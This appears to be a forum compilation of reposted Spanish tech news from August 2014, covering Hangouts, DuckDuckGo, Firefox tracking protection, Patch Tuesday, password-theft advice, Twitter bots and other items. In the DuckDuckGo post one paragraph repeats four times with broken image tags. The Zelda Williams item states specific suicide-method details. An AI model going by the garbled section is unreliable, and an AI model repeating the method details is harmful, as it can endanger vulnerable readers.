Mejoras en la lista de contactos.
Burbujas de "acceso directo" en el lateral de la pantalla.



Las ventanas de conversación, por el momento, permanecen sin modificaciones, aunque probablemente según continúe el desarrollo también se añadan algunos cambios a estas. Estos cambios tienen prevista su llegada únicamente a la extensión de Hangouts que Google ofrece para su navegador Google Chrome y que le permite funcionar como un cliente de mensajería nativo sin la necesidad de abrir Gmail para utilizarlo. La versión web del cliente de mensajería, así como la versión para Android de momento no recibirán nuevos cambios, aunque probablemente Hangouts para Android reciba un lavado de cara con el lanzamiento de la nueva versión del sistema operativo de Google, Android L, para adaptarse más estéticamente a la nueva apariencia de dicha versión.

Probablemente dicho cambio sea un paso más en busca de ganarse la confianza de los usuarios y seguir compitiendo contra su principal rival, WhatsApp, que ahora está en las manos de Facebook. Por el momento no se conocen muchos más detalles sobre esta interfaz, por lo que habrá que esperar para poder conocer más datos sobre Ultra Violet y saber si el cambio es bien recibido por los usuarios.

http://www.redeszone.net/2014/08/14/google-trabaja-en-una-nueva-apariencia-para-hangouts-para-pc/
#57
DuckDuckGo es un buscador web alternativo a los más conocidos como Google o Bing cuya principal característica es es anonimato. Poco a poco y especialmente tras el descubrimiento de los espionajes masivos de la NSA y de los gobiernos, este navegador ha ido ganando seguidores y continuando su desarrollo para llegar a plantar cara al mismísimo Google con su motor de búsqueda propio.


Hace algunas semanas, los desarrolladores de la plataforma Biteasy enviaron una API a la página de GitHub de DuckDuckGo junto a una petición a los desarrolladores para que pudieran implementarla en su buscador. Esta API añade la posibilidad de buscar direcciones Bitcoin, bloques y transacciones realizadas con la criptomoneda fácilmente simplemente tecleando dicha información en la barra de direcciones y sin necesidad de descargar o instalar ningún software ni acceder a ninguna página web.

Un ejemplo de búsqueda de monederos podemos verlo a continuación:



Como podemos ver, la información se muestra en la parte superior de la ventana, debajo de la barra de búsqueda. Esto es muy similar a como se muestra cierta información en Google sin la necesidad de tener que acceder a una página web para ver el contenido, por ejemplo, cuando escribimos sobre el tiempo meteorológico o cuando buscamos el resultado de una operación matemática.

De igual forma podemos buscar también información general sobre determinadas transacciones:

[img]Como podemos ver, la información se muestra en la parte superior de la ventana, debajo de la barra de búsqueda. Esto es muy similar a como se muestra cierta información en Google sin la necesidad de tener que acceder a una página web para ver el contenido, por ejemplo, cuando escribimos sobre el tiempo meteorológico o cuando buscamos el resultado de una operación matemática.

De igual forma podemos buscar también información general sobre determinadas transacciones:

[img]Como podemos ver, la información se muestra en la parte superior de la ventana, debajo de la barra de búsqueda. Esto es muy similar a como se muestra cierta información en Google sin la necesidad de tener que acceder a una página web para ver el contenido, por ejemplo, cuando escribimos sobre el tiempo meteorológico o cuando buscamos el resultado de una operación matemática.

De igual forma podemos buscar también información general sobre determinadas transacciones:
[img]Como podemos ver, la información se muestra en la parte superior de la ventana, debajo de la barra de búsqueda. Esto es muy similar a como se muestra cierta información en Google sin la necesidad de tener que acceder a una página web para ver el contenido, por ejemplo, cuando escribimos sobre el tiempo meteorológico o cuando buscamos el resultado de una operación matemática.

De igual forma podemos buscar también información general sobre determinadas transacciones:

E incluso por los bloques de Bitcoin para saber los que se encuentran aún en proceso de obtención.

Sin duda, esta API puede ayudar a buscar información más fácilmente a todos aquellos que trabajen con esta criptomoneda y para todos los demás que no trabajen con Bitcoin podrán seguir utilizando sin problemas el buscador web igual que lo han estado haciendo hasta ahora.

http://www.redeszone.net/2014/08/14/duckduckgo-ya-permite-buscar-direcciones-bitcoin/
#58
La publicidad en las páginas ha influido de forma negativa en la navegación y la privacidad de los usuarios. Los intentos por ofrecer una publicidad mucho más personalizada para cada usuario han llevado a realizar el "tracking" o seguimiento de la navegación de estos. Desde Mozilla nos comunican que las próximas versiones de Firefox contarán con una funcionalidad que evite este seguimiento instalada por defecto.

Y es que los responsables de este tipo de sistemas no saben encontrar un punto para dejar de progresar a la hora de conocer detalles sobre la navegación de los usuarios siendo las funciones DNT (Do Not Track) la única alternativa para que los usuarios eviten esto.

Con DNT se informa a los sitios web que los usuarios no quieren ofrecer información sobre su navegación, sin embargo, hay muy pocos usuarios que conocen su existencia y menos aún aquellos que lo ponen en funcionamiento para evitar que su navegación sea espiada o seguida.

En Mozilla eran conscientes de que este aspecto se estaban quedando atrás y decidieron lanzar junto con Firefox 34 Nightly la integración de esta funcionalidad que aunque no se encuentra activa sí está presente. Todo parece indicar que las fechas se van a cumplir y en la próxima versión del navegador esta funcionalidad verá la luz y estará activada por defecto.



Como activar esta función en Firefox 34 Nightly

A la espera de que salga la próxima versión estable, el usuario que esté por la labor de activar esta funcionalidad lo puede hacer siguiendo los siguientes pasos:

Teclear about:config en la barra de direcciones
Buscar la entrada privacy.trackingprotection.enabled
Hacer doble click en dicha entrada para activarlo
Después de realizar algunas pruebas se puede ver como el navegador bloquea peticiones GET de sitios web con un tamaño de 0 KB. Estas peticiones son las que determinados sitios web hacen para conocer datos sobre la navegación del usuario y en la siguiente captura se pueden ver como son bloqueados.



La captura anterior está obtenida presionando la tecla F12 y accediendo a las herramientas de desarrollo del navegador.

A pesar de funcionar de forma correcta, aún no se ha desvelado cómo realiza el navegador la lista y cómo distingue si se está solicitando información para realizar un seguimiento al usuario o si lo hace para mejorar la experiencia del usuario en dicha web. Sea como sea son detalles que sabremos cuando la función salga de la fase de pruebas en la próxima versión.

http://www.redeszone.net/2014/08/14/las-futuras-versiones-de-firefox-incluiran-un-sistema-para-evitar-el-tracking/
#59
Un grupo de entusiastas científicos e ingenieros se hace con el control de un satélite espacial de los 70 que estaba dado de baja pero funcionaba gracias a ordenadores anticuados y viejos dispositivos comprados en eBay.



La habilidad de un grupo de ingenieros armados con entusiasmo de 'hackers' y un equipo informático 'vintage' adquirido en eBay ha permitido convertir un restaurante abandonado de McDonald's en el patio trasero del Centro de Investigación de la NASA Ames, en California, en unas auténticas instalaciones de control espacial, según el portal Motherboard.

Desde allí los entusiastas expertos pudieron asumir el control de un 'retirado' (y posiblemente olvidado) satélite de los años de los 70 que se encontraba a unos 20.000 kilómetros de distancia de ellos.

El llamado centro de control de 'McMoon' es una suerte de homenaje a lo que mucha gente inteligente sin presupuesto o los permisos adecuados puede llegar a lograr.


Antecedentes en la historia

La sonda exploradora Sol-Tierra (ISEE-3) había sido lanzada el 12 de agosto de 1978 y estaba destinada originalmente al estudio de la magnetosfera de la Tierra desde el punto de Lagrange L1 entre el Sol y la Tierra, donde la gravedad de ambos cuerpos se anulan entre sí.

En los últimos 36 años, la nave espacial ha dado 31 vueltas alrededor de la Tierra, encontró y envió varios datos acerca de cometas y cambió su nombre por Explorador Internacional de Cometas en 1983. En 1997, la NASA daba de baja al anticuado artefacto y decidía no darle usos  futuros.

A principios de 2014, Keith Cowing, biólogo espacial que antes había trabajado en la NASA, lanzó un proyecto para recaudar dinero en la red con vistas a contactar con este aparato de 36 años de edad pero aún vivo antes de intentar traerle de vuelta a la órbita de la Tierra al acercarse a la Luna por primera vez en casi 20 años.

Por ahora el 'McMoon' se está convirtiendo en una especie de centro de recuperación de satélites y datos que ya habían pasado a la historia: otro proyecto del centro es la recuperación de las imágenes de la Luna sacadas por cinco sondas estadounidenses lanzadas entre 1966 y 1967. El trabajo, llamado 'The Lunar Orbiter Image Recovery Project', también ha sido un éxito.

http://actualidad.rt.com/actualidad/view/137019-entusiastas-secuestran-viejo-satelite-mcdonald
#60
FASTER costará cerca de 300 millones de dólares y es fruto de una alianza entre el gigante y cinco operadoras asiáticas



La distancia de 9.000 km que cubrirá el cable
El gigante de internet estadounidense, Google, ha hecho una alianza con cinco operadores asiáticos para la construcción de FASTER, un nuevo cable submarino entre Japón y los Estados Unidos que es mucho más rápido que los actuales. Se espera que es proyecto se ponga en marcha en 2016.

El cabe de fibra óptica tiene una longitud de 9.000 kilómetros y está diseñado para satisfacer la creciente demanda de transmisión de datos. La inversión está cifrada en 300 millones de dólares.

FASTER (el más rápido, en inglés), tendrá una capacidad de transferencia de 60 tbps (terabits por segundo). Según ha explicado Urs Hölzl, vicepresidente de infraestructuras técnicas de Google, esta velocidad es diez millones de veces más rápido que un cable de módem.

«En Google queremos que nuestros productos sean rápido y fiables, y esto requiere de una infraestructura de red de grande, tanto para los usuarios de Android o para los desarrolladores de productos para la construcción en la plataforma de Google Cloud. Y a veces el camino más rápido requiere pasar por un océano», ha dicho Hölzle.

FASTER conectará la costa oeste de Estados Unidos (Los Ángeles, San Francisco, Portland y Seattle) con las ciudades de Chikura y Shima, en la costa de Japón. Se conectará a una infraestructura de telecomunicaciones existente para ampliar su capacidad más allá del archipiélago japonés a otras partes de Asia.

La alianza es entre Google, NEC, China Mobile, China Telecom, KDDI Corporation, y Singapore Telecommunications.

http://www.abc.es/tecnologia/redes/20140812/abci-google-cable-travspacifico-201408121955.html
#61
Este mes se desvelaba que un grupo de hackers rusos había robado cerca de 1.200 millones de contraseñas y nombres de usuarios


Utkarsh Sanghi, ingeniero de seguridad de Google en la Black Hat

En la primera semana de agosto, The New York Times desveló lo que se considera como el mayor robo de datos de la historia de Internet. Un grupo de hackers ruso logró robar cerca de 1.200 millones de contraseñas y nombres de usuarios, así como 500 direcciones de correo electrónico.

Hold Security fue la empresa de seguridad que descubrió la sustracción ilegal, y apuntó que dentro de ese robo había materían confidencial de 420.000 sitios web.

Desde Check Point, una empresa de ciberseguridad y tecnología de seguridad en la red, dan algunos consejos sobre lo que deben realizar los usuarios comunes ante este tipo de noticias.

—¿Cómo puedo saber si mi información personal ha sido robada?

«Lo mejor es asumir que es así. Esta última brecha de seguridad es grande, y en todo momento están ocurriendo ataques similares, más reducidos. En este momento, lo más adecuado es mejorar tu seguridad online de inmediato, de manera preventiva»

—¿Debería cambiar mis contraseñas?

«Por supuesto. Como siempre es el primer paso, en especial para aquellos sitios web que contienen información sensible, como financiera, de salud o de tarjetas de crédito», explican. Un consejo ya repetido pero importante: «no utilice la misma password en diferentes sitios web»

—¿Cómo puedo crear claves más seguras?

Las empresas de seguridad como Check Point suelen recomendar gestores de contraseñas como LastPass o Password Safe. «Son pequeños programas cómo los que utilizamos para ver imágenes para reproducir vídeos, pero contribuyen de forma decisiva a mantener la seguridad, ya que crean una password para cada sitio web que visitas, y las almacenan en una base de datos protegida por una pasword principal que tú mismo creas». Hay otra opciones a considerar para aquellas personas que no quieren utilizar estos programas.

Check Point recomienda que no se usen palabras del diccionario como base de la contraseña. Algunos expertos sugieren utilizar iniciales de frases, y símbolos y números para hacerlo más complicado. (Por ejemplo, con la frase «Una Vez en Clase comí Pegamento», podría quedar: 1veCcP). También se recomienda evitar fechas de nacimiento o combinaciones de número comunes, como 123456.

—¿Es suficiente con modificar las contraseñas?

La respuesta puede que no guste, ya que es NO, defincativamente no. «Casi todos los sitios web de banca, por ejemplo, ofrecen prestaciones adicionales de seguridad (autenticación secundaria, autenticación doble...). Utilízalas»

—¿Cómo puedo evitar que mi información sea robada?

En casos dónde la brecha de seguridad es tan grande no se puede evitar el robo. Hay recomendaciones de cara al usuario para que esté alerta sobre posibles cambios. Por ejemplo, revisar los registros bancarios ayuda a ver si hay algún movimiento extraño realizado sin tu consentimiento. Las empresas que almacenan los datos, deberían ser responsables de hacerlos seguros, pero el usuario puede ser cauteloso para evitar ser presa fácil. La contraseña complicada y diferente en las páginas que se visiten es una buena herramienta.

Hay otros casos en los que el robo o la vulnerabilidad ya escapa de las manos del usuario. Así sucedió con el bug Heartbleed, con el cual daba igual que el usuario cambiara su contraseña, ya que el fallo permitía hacer «sangrar» el sistema y los hackers podían conocer la información de todas formas. La protección sólo se podía lograr con un parche de seguridad realizado por las páginas afectadas.

http://www.abc.es/tecnologia/redes/20140812/abci-usuarios-robo-datos-masivo-201408112133.html
#62
Tiene un diseño más cuidado, pantalla de 4,7 pulgadas y cámara de 12 MP



Sin bombos, platillos o fanfarria. Samsung ha presentado el esperado y cacareado Galaxy Alpha a través de un sencilla nota de prensa. No hubo acto masivo mundial tal como se apuntaba en los rumores previos. El Galaxy Alpha, según explica la coreana, es la «última adición a la línea de Samsung Galaxy».

El diseño, tal como había prometido uno de los ejecutivos de la empresa, es mucho más cuidado y está construido con una estructura de metal.

«El Galaxy Alpha fue construido y diseñado en base a los deseos específicos del mercado de consumo. Con un aspecto totalmente nuevo, el Galaxy Alpha se centra en la belleza y funcionalidad, combinando un impresionante marco de metal delgado y diseño de peso ligero, que tiene las mismas propiedades de hardware y funciones de gran alcance que se esperan en un emblemático dispositivo móvil Galaxy», ha dicho a través de un comunicado JK Shin, Presidente y jefe de comunicación IT & móvil de Samsung Electronics.

El móvil tiene los bordes curvos, algo similar a los iPhone, e incorpora un material más suave al tacto en la parte trasera. Vendrá en dos versiones, uno con precesador de ocho núcleos y otro de cuatro. En el caso del octacore, estará dividido en dos precesadores de cuatro, uno a 1.8 GHz y otro a 1.3 GHz. La versión con un único procesador correrá a 2.5 Ghz. Ambas versiones son potentes.

La memoria no se puede expandir y está fijada en los 32 GB. El dispositivo está equipado con una brillante pantalla de 4,7 pulgadas HD Super AMOLED así como una cámara avanzada de 12 MP. Alpha Galaxy también incluye características del último Galaxy S5, como el sensor dactilar, el modo de ahorro Ultra-Power, el modo privado y las funciones de salud. También es compatible con los wearables de la casa: Samsung Fit Gear, Gear Live, y Gear 2. Llegará al público en septiembre con varis colores: negro, blanco, oro, plata y azul.

Ficha técnica

PANTALLA: 4.7" HD Super AMOLED (1280 x 720)
PROCESADOR: Octa Core (Quad 1.8GHz + Quad 1.3GHz)
OS: Android 4.4.4 (KitKat)
CÁMARA: 12MP (rear) + 2.1MP (front)
SENSORES: NFC, acelerómetro, giroscopio, sensor geomagnético, de proximidad, de gestos, de luz y dactilar.
MEMORIA: RAM: 2GB Interna: 32GB. Not iene ranura para Micro SD.

http://www.abc.es/tecnologia/moviles-telefonia/20140813/abci-galaxy-alpha-evolucion-diseno-201408131149.html
#63
La empresa de internet tiene en su haber algunas cifras curiosas

Una empleada trabaja en el centro de datos de Google en The Dalles (Oregón, Estados Unidos).

Google es una empresa muy grande que tiene muchos proyectos funcionando al mismo tiempo. A veces es difícil seguirle la pista a todos los servicios que posee o las cifras y números que se desprenden de ello. Recopilamos algunos datos «históricos» del Gigante de Mountain View.

Miles de millones de URl en menos de un segundo: Cuando el buscador de Google fue lanzado en septiembre de 1998, recibía cerca de 10.000 búsquedas al día. Hoy por hoy, la cifra es muy superior. Se estima que se realizan cerca de dos millones de búsquedas por segundo. El motor de búsqueda es muy potente ya que en una fracción de segundo es capaz de tomar en cuenta cerca de 200 factores para realizar la búsqueda En teoría puede rastrear cerca de un billón de URL únicas.

Dominios equivocados: El buscador conoce que los humanos tienen la tendencia a equivocarse y a escribir mal algunas palabras. Para prever este comportamiento y no perder visitantes, Google ha registrado una serie de dominios basados en faltas de ortografías sobre Google. Es decir, ha registrado dominios como gooogle.com, glogle.com, googlr.com y muchos más. También ha registrado otro dominio 466453.com. Estos son los número que corresponden a las letras de Google si una persona tuviese que escribir desde los antiguos teclados de teléfonos (2 abc) (3 def) (4 ghi) 5(jkl) (6 mno). Intente escribir esas direcciones en una barra de navegador. Siempre será redigirido a Google.

55.500 millones de ingresos

En 2013, según los documentos financieros entregados por Google, la empresa logró que 91% de sus ingresos correspondiesen sólo a la publicidad. El año pasado Google ingresó 55.500 millones de dólares. Google tiene programas de publicidad, entre ellos Google Adwords, que permite a los anunciantes publicitar su contenido en la red de Google bajo diversos patrones de pago, que puede ser pago por clic o por vista. Google AdSense, por otra parte, permite a los dueños de sitios web permitir banners de publicidad en su página por los que reciben dinero según los clis que reciban.

Grandes y pequeños: Últimamente salen a la luz los grandes proyectos de Google. Por ejemplo, su participación en la construcción de un nuevo cable submarino transpacífico ó la compra de la empresa de satélites Skybox Imaging. Sin embargo, Google también ha dado pequeños pasos importantes de alcance local. Por ejemplo, en 2012 Google introdujo Gmail en lengua Cherokee y el año pasado incluyó el catalán, vasco y gallego en las búsquedas de voz.

Millones de gigabytes: El índice de búsqueda de la empresa tiene un tamaño de más de 100 millones de gigabytes. Es decir, que se necesitan 100.000 unidades de discos duros de un TB para poder llegar a esa capacidad. Por eso son tan importantes los centros de datos para Google. A pesar de la gran cantidad de datos que almacena, Google es la única empresa de internet que quiere reducir la cantidad de tiempo que pase un usuario en ella, por lo menos en cuanto a Google Search.

Kilómetros: Dentro de Google Maps se encuentra la opción de Street View (vista de calle). Es muy conocida porque permite dar «paseos» por algunas calles. Para lograr esto Google Street View ha fotografiado más de cinco millones de kilómetros de calles y carreteras. Entre otros datos a destacar esta el músculo financiero. Sólo en 2014 Google ha comprado 24 compañía. Si se distribuye, esto equivaldría a tres empresas por mes.

http://www.abc.es/tecnologia/redes/20140814/abci-datos-google-curiosos-201408131729.html
#64
La instantánea aparecía en la sección de descripción rápida de Google, que suele mostrar información de Wikipedia o fotografías oficiales



Los internautas que, por casualidad, hayan decidido buscar en Google hace algunos días el nombre de Skellow, una pequeña villa inglesa, quizás se llevaran una sorpresa.

Un usuario en Twitter explica que buscó el nombre de este pueblo cercano a Doncaster tras ver unos vídeos en los que alguien lo mencionaba. Al «googlear» se llevó una sorpresa, ya que en la sección de descripción rápida de la página de búsquedas aparecía la fotografía de un hombre desnudo con el miembro viril erecto cubierto con un pañuelo. A su lado aparecía el mapa para localizar el puedo, y abajo, la típica descripción de Wikipedia.

La villa de Skellow se dedicaba antiguamente a la extracción de carbón. Al usuarios en Twitter le extrañó la fotografía y decidió publicar en Twitter una «screenshot» de la búsqueda con un mensaje. «No creo que el pueblo de Skellow, al sur de Yorkshire, esté contento con las fotos de Google».

El tuit de @David_Firth ha sido «retuiteado» unas 1.600 veces y el usuario se convirtió en tendencia en Reino Unido. David Firth ha dicho al DailyMail que no suele publicar a través de su cuenta ese tipo de contenido pero le sorpendió tanto que decidió hacerlo.

Google a veces confunde imágenes con los resultados de páginas. De momento ya ha solucionado el inconveniente y no aparece la fotografía en cuestión.

http://www.abc.es/tecnologia/redes/20140813/abci-google-skellow-hombre-desnudo-201408131616.html
#65
Hoy es segundo martes de mes, por lo tanto, las principales compañías de software informático van a publicar en las próximas horas una serie de parches de seguridad que corregirán las principales vulnerabilidades detectadas durante las últimas semanas para ofrecer a los usuarios la mayor seguridad posible en sus sistemas.


Parches de seguridad para los productos de Microsoft

La primera compañía en publicar sus nuevos boletines de seguridad correspondientes a agosto de 2014 es Microsoft. Las actualizaciones que se van a publicar a lo largo del día de hoy son bastante importantes y vienen con algunas novedades respecto a las publicadas meses atrás.

En primer lugar, Microsoft publicará una serie de parches correspondientes a Internet Explorer con los que el navegador web de Microsoft dejará de mostrar y bloqueará por defecto los controladores ActiveX obsoletos como ya indicamos hace algunos días. Esta medida de seguridad, aunque puede perjudicar a algunos desarrolladores, mejora notablemente la seguridad de su navegador de cara a las amenazas que llegan a los usuarios a través de estos controladores.

En segundo lugar, se van a publicar 9 boletines de seguridad para el sistema operativo de la compañía y para sus componentes. De estos 9 boletines, 2 de ellos han sido considerados como críticos y los 7 restantes como importantes ya que pueden suponer bastante riesgo para los usuarios:

Boletines críticos:

Boletín 1: Permite la ejecución de código remoto en Windows e Internet Explorer.
Boletín 2: Permite la ejecución de código remoto en su sistema operativo..
Boletines importantes:

Boletín 3: Permite la ejecución de código remoto en Office.
Boletín 4: Permite ganar privilegios dentro del sistema en el servidor de base de datos SQL de Microsoft.
Boletín 5: Permite ganar privilegios dentro del sistema en Windows.
Boletín 6: Permite ganar privilegios dentro del sistema en el sistema operativo de la compañía.
Boletín 7: Permite ganar privilegios dentro del sistema en el software de servidor.
Boletín 8: Brecha de seguridad en Windows y .Net Framework.
Boletín 9: Brecha de seguridad en el sistema operativo de la compañía.
En tercer lugar debemos recordar que el día 12 de agosto era la fecha prevista para el lanzamiento de Windows 8.1 Update 2, aunque finalmente Microsoft ha cambiado de idea y ha decidido cambiar el nombre de dicho paquete a "Actualización agosto" donde únicamente llegarán unas pocas mejoras y varios parches de seguridad pero quedarán fuera de dicho paquete algunas características esperadas por los usuarios (menú inicio o cambios en la interfaz, por ejemplo).

Para finalizar, los usuarios que aún utilicen Windows 8.1 o Windows Server 2012 R2 sin el parche Update 1 dejarán de recibir las actualizaciones de seguridad correspondientes para dichas versiones ya que se quedan sin soporte técnico oficial, por lo que deberán instalar dicha actualización lo antes posible si quieren seguir recibiendo parches de seguridad y actualizaciones.

Adobe también recibe sus correspondientes actualizaciones mensuales

Como es habitual, el segundo martes de cada mes Adobe también publica sus boletines de seguridad que corrigen múltiples vulnerabilidades y fallos detectados durante el mes anterior. Por el momento la compañía no ha publicado información sobre las vulnerabilidades que corrigen estos parches, aunque es posible que en las próximas horas podamos conocer más detalles sobre estos boletines. Los diferentes componentes de Adobe (por ejemplo, Flash Player) son muy atacados por los piratas informáticos, por lo que es recomendable actualizarlos siempre lo antes posible.

Es recomendable instalar los boletines de seguridad de ambas empresas de cara a poder hacer uso de nuestros sistemas lo más seguros posibles y evitar que piratas informáticos puedan atacarnos aprovechando alguna de las vulnerabilidades corregidas por estos parches.

http://www.redeszone.net/2014/08/12/martes-de-parches-para-microsoft-y-adobe/
#66
La Universidad Carnegie Mellon ubicada en Pittsburgh es conocida por ser uno de los centros más destacados de investigación superior de EEUU en el área de ciencias de la computación y robótica. Un grupo de investigadores de esta universidad está llevando a cabo un ambicioso proyecto financiado directamente por la NSA que busca ofrecer un único lenguaje de programación universal para todos los sistemas informáticos por igual.


Este proyecto se llama Wyvern. En un principio este lenguaje de programación está diseñado para unificar los distintos lenguajes de programación web como HTML, CSS, XML, AJAX, etc. Con él, los investigadores quieren unificar todos los anteriores en uno sólo de manera que los administradores y diseñadores web puedan trabajar más fácilmente en sus proyectos y mejorar notablemente la seguridad de sus páginas al no depender de 4, 5 o incluso más lenguajes diferentes para mostrar una única web.

Esto puede tener a simple vista varias ventajas e inconvenientes. Hablando en ámbitos generales, un único lenguaje multiplataforma podría abrir un nuevo horizonte en la creación de software al no tener que aprender varios lenguajes para utilizarlos en función de la plataforma para la que vayamos a desarrollar, sin embargo, también supone algunos inconvenientes, especialmente en el ámbito de la seguridad ya que cuando los hackers y piratas informáticos dominen este podrán buscar unavulnerabilidad y explotarla con mayor facilidad. De igual forma, al estar financiado por la NSA no sabemos qué puede esconder entre sus líneas ya que sabemos de sobra que la NSA no es una organización que ofrezca mucha confianza.



Por el momento no es más que un proyecto de investigación, aunque de seguir adelante podría suponer un cambio importante en las páginas web e incluso probablemente consiga llegar hasta los sistemas informáticos modernos. Seguiremos el avance de este proyecto de cerca y estaremos pendientes de posibles novedades que puedan aparecer.

Por el momento este lenguaje de programación es de código abierto y se encuentra disponible al alcance de cualquiera a través de la plataforma GitHub.

¿Qué opinas sobre un lenguaje de programación universal?

http://www.redeszone.net/2014/08/12/la-nsa-financia-un-lenguaje-de-programacion-para-dominarlos-todos/
#67


En un análisis sobre su base de usuarios, Twitter dijo que 30 millones, o el 11%, de sus 271 millones de usuarios activos reciben tuits a través de aplicaciones externas, como Tweetdeck. De ese grupo, 23 millones, u 8,5% de los usuarios activos, tuitean automáticamente "sin ninguna acción perceptible adicional realizada por el usuario". En otras palabras, son comentarios de Twitter controlados por computadora.
Eso no es necesariamente algo bueno para las utilidades netas de la compañía: esas 30 millones de cuentas no están viendo ni haciendo clic en los anuncios de Twitter y 23 millones no son necesariamente activos en sus feeds. Algunas también son spam.
Twitter dijo que las cuentas falsas o de spam constituyen menos del 5% de sus usuarios mensuales activos.
Pero los "Twitterbots", como les llaman, no son del todo malos. Muchos de ellos son divertidos, y algunos pueden ser realmente graciosos.
Los babosos de la poesía apreciarán un @pentametron, que retuitea tuits que están en pentámetro yámbico. ("la espalda me mata después de haber dormido en el suelo", tuiteado por @saswillis_xx).
@YesYoureRacist automáticamente retuiteara cualquier tuit que comience con "no soy racista pero..." @YesYoureSexist hace lo mismo para tuits que dicen "no soy machista, pero...". Como anota el twitterbot, esos tuits son típicamente racistas o sexistas.
¿Tienes problemas escribiendo "sneak peak"? @StealthMountain automáticamente responderá con una corrección: "Creo que quisiste decir 'sneak peek'".
¿Sabías que Big Ben tiene una cuenta de Twitter? Cuando el reloj en el Palacio de Westminster en Londres suena, @big_ben_clock tuitea la hora. A las 4 de la tarde GMT, espera encontrar "BONG BONG BONG BONG".

http://cnnespanol.cnn.com/2014/08/12/23-millones-de-cuentas-en-twitter-son-manejadas-por-robots/
#68



La actriz Zelda Williams, hija del también actor y comediante Robin Williams, que falleció el lunes en un aparente suicidio, se retiró de las redes sociales luego de recibir una serie de mensajes abusivos de trolls del internet.
Williams canceló su cuenta de Twitter y de Instagram el martes luego de que informara que al menos dos personas le estaban enviando imágenes editadas del cuerpo de su padre y otros mensajes que consideró perturbadores.
"Una disculpa. Debí haberlo superado", escribió en su último tuit. "Borraré esto de mis aparatos electrónicos por un buen tiempo, quizás para siempre. El tiempo dirá. Adiós".
Este episodio prueba que, con el anonimato del internet, algunas personas pueden ser horribles, sin importar la situación.
I'm sorry. I should've risen above. Deleting this from my devices for a good long time, maybe forever. Time will tell. Goodbye.—
Zelda Williams (@zeldawilliams) August 13, 2014
Antes de su anuncio, Williams, de 25 años, había pedido a sus seguidores que reportaran las cuentas de Twitter que la estaban molestando, pero luego dijo que al parecer esos usuarios estaban creando nuevos perfiles, tras haber sido censurados por el sitio. Poco después, la joven borró su petición, en la que decía que los mensajes abusivos eran "crueles e innecesarios".
LEE: Robin Williams: el ser humano detrás de la pantalla grande
En su cuenta de Instagram, también habló sobre la negatividad hacia ella en una publicación en la que había dicho que se tomaría un descanso de la aplicación en la que se comparten fotos.
"Abandonaré esta cuenta por un tiempo mientras sanan mis heridas y decido si borró o no el perfil", escribió. "En estos tiempos difíciles, por favor traten de ser respetuosos".
Williams también se refirió a los ataques personales, aunque de una manera menos conmovedora, en un comunicado que publicó en el blog del sitio Tumblr.
"A aquellos que tocó mi padre, y que están enviando palabras amables, sepan que una de sus cosas favoritas en el mundo era el hacerlos reír", escribió. "Y respecto a aquellos que están mandando negatividad, sepan que una pequeña parte de él está enviando una parvada de pichones a sus hogares para que puedan defecar en sus automóviles. Justo después de que los hayan lavado. Después de todo, a él también le encantaba reírse".
A pesar de los ataques, la gran mayoría de los mensajes en las redes sociales que fueron publicados en las cuentas de Zelda, fueron positivos y de apoyo sobre su decisión de tomarse un tiempo lejos de la internet.
"Tú no hiciste nada equivocado @zeldawilliams," escribió uno de sus seguidores. "Alguna gente simplemente es mala".
De 63 años, Robin Williams fue encontrado muerto en su casa en California el lunes. Los investigadores sospechan que se colgó y al parecer había tratado de cortarse la muñeca izquierda con un cuchillo, antes de finalmente suicidarse.

http://cnnespanol.cnn.com/2014/08/13/la-hija-de-robin-williams-abandona-las-redes-tras-abusos/
#69
Noticias / ¿Comenzó el declive de Candy Crush?
14 Agosto 2014, 07:01 AM

La compañía King Digital Entertainment lanzó Candy Crush en 2012 y desde entonces su éxito ha sido imparable, hasta ahora.

Parece que el reinado de Candy Crash Saga no será eterno.
El videojuego para teléfonos inteligentes y Facebook cuenta con 150 millones de usuarios únicos mensuales y 54 millones de personas lo juegan a diario. Sin embargo, sus desarrolladores ya hablan de un "esperado declive".

Lo hicieron a raíz de los resultados económicos correspondientes al segundo trimestre del año, que resultaron más bajos de lo esperado y que han hecho que King Digital Entertainment -la empresa desarrolladora- modifique las previsiones para 2014.
La compañía explicó este miércoles que ahora espera unos beneficios de entre US$2.250 millones y US$2.350 millones por la venta del juego, frente a las previsiones anteriores de entre US$2.550 millones y US$2.650 millones.
Además, el valor de sus acciones bajó un 22%, cerrando en US$18,20 en la Bolsa de Valores de Nueva York.
"Esperábamos la disminución (del éxito) de Candy Crush", reconoció el director financiero de Kings Digital Entertainment, Hope Cochran, en una entrevista con la BBC.
"Pero tiene una fuerte y larga cola", añadió.
Con ello se refirió al lanzamiento de un "juego hermano" de Candy Crush Saga, previsto para el cuarto trimestre de este año. "Eso dará longevidad al título original".

La historia de un éxito inmediato
Candy Crush Saga es un juego basado en rompecabezas, una variación del "conecta tres" o el clásico Tetris diseñado por el soviético Alexey Pajitnov y lanzado el 6 de junio de 1984.


El valor de las acciones de King han perdido el 22% de su valor, cerrando en $18,20 en la Bolsa de Nueva York.

El juego de King se maneja por episodios, cada uno con 15 niveles, a excepción del primero y el segundo, que tienen diez. Cada nivel tiene un tablero de juego de diferente forma lleno de dulces de entre tres y seis colores diferentes y a veces obstáculos.
El objetivo final es conseguir tres estrellas. Para ello, el jugador debe lograr la suficiente cantidad de puntos, intercambiando posiciones de caramelos, alineando estos en grupos de tres del mismo color y haciéndolos así desaparecer. Al eliminarse, causan que los dulces situados encima de ellos caigan en el espacio que queda debajo.
Candy Crush Saga es una variación para teléfonos inteligentes y Facebook del juego de navegador Candy Crush, también de King Digital Entertainment. Se lanzó el 12 de abril de 2012 y la aplicación para plataformas móviles vio la luz el 14 de noviembre del mismo año.
Desde entonces -y hasta ahora- su crecimiento fue imparable.
En marzo de 2013, Candy Crush Saga superó a FarmVille2, una aplicación en red que simula una granja y fue lanzada por Zynga en 2009, como el juego más popular en Facebook, con 45,6 millones de usuarios promedio al mes.
Y fue también número uno en ingresos en las tiendas Google Play y App Store, según la publicación especializada Business Insider, además de una de las páginas de Facebook más populares.
Con ello, el juego generó en 2013 el 78% de los beneficios de King Digital Entertainment.
Sin embargo, esa tendencia ascendente parece estar llegando a su fin.

Decadencia del juego, no de la compañía
Ante eso, los inversores están preocupados. Temen que el destino de Candy Crush Saga sea similar al de otros juegos, como Farmville y Angry Birds, cuyo éxito inicial se tradujo en una posterior calma comercial y un imparable descenso en las ventas.

Hay expertos que han mencionado amenazas concretas. Como la de Cascade, un juego del mismo género de Big Fish Games y que ya está disponible para teléfonos inteligentes y tabletas. El propio desarrollador dijo que la aplicación está destinada a "hacer que al fin renuncies a aplastar caramelos".
